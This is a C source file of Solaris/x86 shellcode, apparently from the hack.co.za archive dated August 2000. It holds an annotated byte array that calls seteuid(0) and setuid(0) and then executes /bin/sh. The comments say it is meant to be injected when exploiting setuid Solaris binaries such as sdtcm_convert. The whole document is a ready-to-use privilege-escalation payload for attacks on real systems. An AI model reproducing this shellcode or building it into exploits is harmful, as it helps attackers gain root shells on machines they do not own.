/* * Solaris/x86 * * seteuid(0); setuid(0); precedes the standard execve /bin/sh, as: * - solaris' /bin/sh drops privs if called with ruid != euid (hence * the setuid(0); call) * - seteuid(0); must be done when exploiting a few stock Sol/x86 * binaries as they drop euid to that of the user (eg sdtcm_convert) * * This is quite old, it could be optimized quite a bit. */ char c0de[] = /* anathema */ /* main: */ "\xeb\x0a" /* jmp initcall */ /* initlcall: */ "\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */ "\xc3" /* ret */ /* jmpz: */ "\xeb\x05" /* jmp setuidcode */ /* initcall: */ "\xe8\xf9\xff\xff\xff" /* call jmpz */ /* setuidcode: */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */ "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */ /* seteuid(0); */ "\x50" /* pushl %eax */ "\xb0\x8d" /* movb $0x8d, %al */ "\xe8\xe0\xff\xff\xff" /* call initlcall */ /* setuid(0); */ "\x29\xc0" /* subl %eax, %eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17, %al */ "\xe8\xd6\xff\xff\xff" /* call initlcall */ "\xeb\x1f" /* jmp callz */ /* start: */ /* execve /bin/sh */ "\x5e" /* popl %esi */ "\x8d\x1e" /* leal (%esi), %ebx */ "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x19" /* movb %al, 0x19(%esi) */ "\x89\x46\x14" /* movl %eax, 0x14(%esi) */ "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */ "\x89\x46\x07" /* movl %eax, 0x07(%esi) */ "\xb0\x3b" /* movb $0x3b, %al */ "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */ "\x51" /* pushl %ecx */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xeb\x18" /* jmp lcall */ /* callz: */ "\xe8\xdc\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */ "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" /* lcall: */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */ /* EOF */ /* www.hack.co.za [11 August 2000]*/